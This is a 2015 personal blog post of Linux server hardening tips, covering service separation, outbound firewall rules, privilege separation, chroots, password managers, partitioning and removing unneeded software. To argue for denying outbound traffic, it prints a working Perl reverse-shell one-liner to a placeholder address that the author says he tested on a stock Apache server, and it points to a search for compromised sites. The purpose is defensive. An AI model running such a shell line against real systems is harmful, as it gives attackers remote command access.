Saturday, June 20, 2015

Locking Shit Down

I don't know if it's just me, but it seems like there is an awful lot of funny stuff going on in the cloud as of late. After the Sony hacks, I predicted that 2015 would be a bad year for cyber security. Looks like I was right about that, considering every branch of our federal government was hacked recently. Now, I manage a few servers myself, and I've had my share of compromises too. But the last few months have been utterly ridiculous. I have reinstalled my personal system 4 times since January because I suspected some malware had snuck onboard, and I'm getting really sick of doing that. Today I reinstalled & rebuilt yet another server from scratch, which is a major pain in the ass.

This is the server I'd been running a Kippo SSH honeypot on. I had Kippo running for about a month or so, and from that experience I cannot recommend that anyone run a honeypot on a server that they run other services on. It's just not worth the risk. Yeah, Kippo is relatively secure, and sure it's an emulated shell that is not capable of doing much, but that does not mean it can't be hacked. In the end, (if nothing else), it's just another open port to worry about.

Run Public Services On Separate Systems

This should be obvious, but let's narrow the definition of public. When you have a box running a VPN server, bittorent server, web server, honeypot, and tor relay... well, things can get messy. It is definitively more secure to dedicate a system to a particular task, and manage several smaller systems than it is to run everything on one big powerful box and attempt to lock it all down. In the age of cheap & abundant virtualization, there's no reason not to segregate your servers. My advice is to at least keep the public services (bittorent, web server, tor, etc) on a different server than your personal cloud storage box, or what-have-you. Consider a bittorent client for a moment. It is generally seen as a pretty benign risk service to run (all legal issues aside), and overall, clients like Transmission have stood the test of time. But bittorent clients connect with tens of thousands of different hosts everyday, and all it takes is a few bad packets and a zero day exploit to ruin your day. Torrent clients also seem to be written specifically to evade firewalls, as they work just fine under very strict rules. You don't even need to open a port, the program will figure out a way to connect to the peer, wherever they are. 

Deny Outbound Connections

In this day and age, it's no longer sufficient to keep your firewall's outbound policy to ACCEPT while dropping inbound connections. Why? Imagine you're running a webserver of some sort, and somebody manages to find an exploit that allows them to upload even a one line of rogue php (this happens all of the time). For example, if this manages to be written to a file on your server, and your outbound policy is set to ACCEPT, the attacker will get a shell with whatever privledges the server user has:


perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"1.2.3.4:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If your system is not fully up to date, (or even if it is) all it takes is some privelege escalation exploit, or slight misconfiguration of permissions in the serving directory, and you are screwed. By the way, I tested this on a fresh Ubuntu 14.04 server, running apache as it is out of the box, with success. Most Linux systems have Perl installed on them, and removing it is a real pain (too many services depend on perl, and besides, perl is cool!). Denying outbound connections would prevent this from working, and chrooting apache as well would severely limit the attack vector. If you think this is paranoia, try googling something like "inurl:/r00t.php".

For locking down an apache server that is only serving clients to a particular private subnet, you could use something like this:

$IPT -A INPUT -i eth0 -s 10.0.0./24 -d 10.0.0.1 -p tcp -m tcp --dport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -s 10.0.0.1 -d  10.0.0./24 -p tcp --sport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -m owner --uid-owner www-data -j REJECT
 


Run Everything as a Different User

This should be number one. Considering the example above, when an attacker manages to get a shell on your system, they are limited to the resources running as and owned by that user. If you implement proper access control policies, than even if someone manages to get a shell, they will not be able to access the files and programs that are owned by different users. Our old friend Mr Meterpreter, is a perfect example of how privilege separation could have saved a lot of systems from rape and pillage. When someone manages to get a meterpreter trojan onto your Windows system, it is game over. Your webcam, microphone, 'My Documents' folder, and usually most of your C:\ drive is accessable by you, the user. Yeah, I know that's just how personal computers work, but it's also a good reason to use Linux and lock your shit down. The functionality of Metasploit's meterpreter on a linux machine is much, much more limited than it is on a Windows system, and mostly because of privilege separation,.

Chroot Everything Else

Another priceless tip is to chroot services that are open to the world instead. I don't understand why chrooting is not used more often. A strong chroot combined with a strict firewall should be enough to stop most attackers before they can do any real harm. Chroots are basically 'jails' for programs. A chroot consists of a directory inside a directory that is owned by root, with an entire fake unix filesystem inside that directory. So, for a tor chroot, you'd have for instance '/chroot' owned by root, and than '/chroot/tor' owned by a user with limited privileges and no valid shell. Than you would use the ldd command to figure out which libraries tor depends on to operate, and you'd copy them all into the /chroot/tor/ directory, so you'd have '/chroot/tor/var' and '/chroot/tor/lib', 'chroot/tor/etc', etc... If a hacker manages to break into the chroot, than they can do as much damage as they want to the tor service, but nothing else. That is at least the theory.

Edit: A note on chroots. A chroot can easily be created for most occaisons with the program Sandfox, which is written entirely in bash, so it works on all Linux systems and possibly even mac systems. It's perfect for chrooting Firefox, which will drastically improve your defenses against client side attacks on Desktop systems.

Use a Password Manager

Keyloggers are pretty useless when you don't type. Password managers are excellent because you can generate, copy and than paste a password where it's needed, and never have to type the password itself. Yes, there are some advanced trojans out there that can read the clipboard (and some not so advanced ones on Android systems...), but generally this is a really good move. It's also a lot easier to have /dev/urandom come up with your passwords than it is to invent your own totally random, 40 character stings. If at all possible, don't even use passwords, or use some kind of dual factor authentication system. Even in 2015, weak passwords are still one of the most common mistakes leading to full system compromise.

Use Separate Partitions

This should be a no-brainer, but it's just not. Even the Debian installer still struggles to properly partition a disk with seperate /var /tmp /usr /home /root & /boot partitions. Usually the installer fails because it does not allocate enough space to /root, and the system will not fit on the drive. I really wish someone would fix that. The solution is to partition the drive yourself before your install it. Use something like a Gparted live disc, because IME the installers built in partitioner really sucks. When you have, for example, /tmp on it's own partition, you can set things like nodev, nosuid, and noexec for that partition. This goes a hell of a long way keeping your system secure. The /tmp is generally world readable, writable and executable, and is almost always where a hacker will first try to download his malware after getting a shell.

Uninstall/Disable Whatever You Don't Need

The more applications running any given system, the more code there is to mess with, and hence more attack vectors. If you don't need a print server, get rid of CUPS! If you don't use RPC services, get rid of rpcbind. If you don't need service discovery, get rid of avahi. You get the point. Oh, one last thing... if you don't compile your own code, uninstall the compliers! It's often easier to upload a text file than a binary file, particular in the web app world.

Edit: Personally, I need the compilers, so instead of removing them you can just limit their execution to the superuser:

~: dpkg --list | grep compiler
ii  g++                           4:4.9.2-2ubuntu2   amd64   GNU C++ compiler
ii  g++-4.9                       4.9.2-10ubuntu13   amd64   GNU C++ compiler
ii  gcc                           4:4.9.2-2ubuntu2   amd64   GNU C compiler
ii  gcc-4.9                       4.9.2-10ubuntu13   amd64   GNU C compiler


~: cd /usr/bin
~: chmod 750 g++-4.9  gcc-4.9

No comments:

Post a Comment